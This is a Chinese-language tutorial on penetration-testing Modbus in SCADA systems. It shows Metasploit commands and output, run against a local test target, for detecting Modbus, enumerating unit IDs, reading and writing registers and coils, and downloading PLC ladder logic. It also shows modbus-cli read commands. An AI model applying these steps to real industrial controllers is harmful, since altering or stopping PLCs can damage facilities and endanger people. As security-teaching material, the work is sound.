SCADA系统渗透之modbus

SCADA(Supervisory Control And Data Acquisition)系统，即数据采集与监视控制系统。它应用领域很广，可以应用于电力、冶金、石油、化工、燃气、铁路等领域的数据采集与监视控制以及过程控制等诸多领域。

前言

SCADA(Supervisory Control And Data Acquisition)系统，即数据采集与监视控制系统。SCADA系统是以计算机为基础的DCS与电力自动化监控系统；它应用领域很广，可以应用于电力、冶金、石油、化工、燃气、铁路等领域的数据采集与监视控制以及过程控制等诸多领域。

基本通信端口

modbus             port 502
dnp                port 19999
dnp3               port 20000
fieldbus           port 1089-91
ethernet/IP        port 2222
etherCAT           port 34980
profinet           port 34962-64

Modbus协议

Modbus是一种串行通信协议，是Modicon公司（现在的施耐德电气 Schneider Electric）于1979年为使用可编程逻辑控制器（PLC）通信而发表。Modbus已经成为工业领域通信协议事实上的业界标准，并且现在是工业电子设备之间常用的连接方式。这也是SCADA系统中广泛使用的协议。

发现

msf中搜索modbus

msf5 > search modbus

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/admin/scada/modicon_command        2012-04-05       normal  No     Schneider Modicon Remote START/STOP Command
   1  auxiliary/admin/scada/modicon_stux_transfer  2012-04-05       normal  No     Schneider Modicon Ladder Logic Upload/Download
   2  auxiliary/scanner/scada/modbus_findunitid    2012-10-28       normal  No     Modbus Unit ID and Station ID Enumerator
   3  auxiliary/scanner/scada/modbusclient                          normal  No     Modbus Client Utility
   4  auxiliary/scanner/scada/modbusdetect         2011-11-01       normal  Yes    Modbus Version Scanner

检测是否为modbus

msf5 auxiliary(scanner/scada/modbusdetect) > exploit 

[+] 127.0.0.1:5020        - 127.0.0.1:5020 - MODBUS - received correct MODBUS/TCP header (unit-ID: 1)
[*] 127.0.0.1:5020        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

枚举

已经确认目标实际上正在运行modbus协议，下一步是枚举连接设备的单元ID。这类似于TCP / IP中的ping扫描，但结果的可靠性稍差。Modbus允许最多254个连接设备。要操纵或与任何modbus设备通信，我们必须拥有其UNIT ID，与使用TCP / IP中的IP地址完全不同。

msf中枚举设备单元

msf5 auxiliary(scanner/scada/modbus_findunitid) > exploit 
[*] Running module against 127.0.0.1

[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  1
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  2
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  3
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  4
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  5
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  6
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  7
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  8
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID  9
....................................................................

读取和写入Modbus设备

msf模块

msf5 auxiliary(scanner/scada/modbusclient) > show options 

Module options (auxiliary/scanner/scada/modbusclient):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   DATA                             no        Data to write (WRITE_COIL and WRITE_REGISTER modes only)
   DATA_ADDRESS                     yes       Modbus data address
   DATA_COILS                       no        Data in binary to write (WRITE_COILS mode only) e.g. 0110
   DATA_REGISTERS                   no        Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4
   NUMBER          1                no        Number of coils/registers to read (READ_COILS ans READ_REGISTERS modes only)
   RHOSTS                           yes       The target address range or CIDR identifier
   RPORT           502              yes       The target port (TCP)
   UNIT_NUMBER     1                no        Modbus unit number


Auxiliary action:

   Name            Description
   ----            -----------
   READ_REGISTERS  Read words from several registers

该模块一共定义了四种操作：


1. READ_REGISTERS
2. WRITE_REGISTERS
3. READ_COILS
4. WRITE_COILS

UNIT_NUMBER为之前枚举的单元，NUMBER为读取或写入的数量，DATA_ADDRESS为数据地址

下载PLC梯形图逻辑

在SCADA / ICS网络中，PLC是网络内部发生的动作背后的大脑。这些小型计算机被编程为控制连接到它们的设备。该软件程序称为“梯形逻辑”。攻击者可能下载并分析PLC的梯形逻辑，以阐明PLC控制的内容和方式。通过理解逻辑，可以改变可能对设施造成破坏性影响的值。

如果梯形逻辑不受保护，将成功下载程序

msf5 auxiliary(admin/scada/modicon_stux_transfer) > set MODE RECV 
MODE => RECV
msf5 auxiliary(admin/scada/modicon_stux_transfer) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 auxiliary(admin/scada/modicon_stux_transfer) > set rport 5020
rport => 5020
msf5 auxiliary(admin/scada/modicon_stux_transfer) > exploit 
[*] Running module against 127.0.0.1

[*] 127.0.0.1:5020 - 127.0.0.1:5020 - MODBUS - Sending read request
[*] 127.0.0.1:5020 - 127.0.0.1:5020 - MODBUS - Retrieving file

Modbus-cli

安装

Modbus-cli是一个命令行（cli）工具，使我们能够读写modbus / tcp（非串行modbus）

安装

1	gem install modbus-cli

帮助

1	modbus --help

确定地址

不同设备数值及规定不一样，下图仅为例子：

读取

读取前十个寄存机值

1	modbus read <IP> ％MW100 10

1	modbus read <IP> 400101 10

输出到文本

1	modbus read --output res.txt <IP>％MW100 100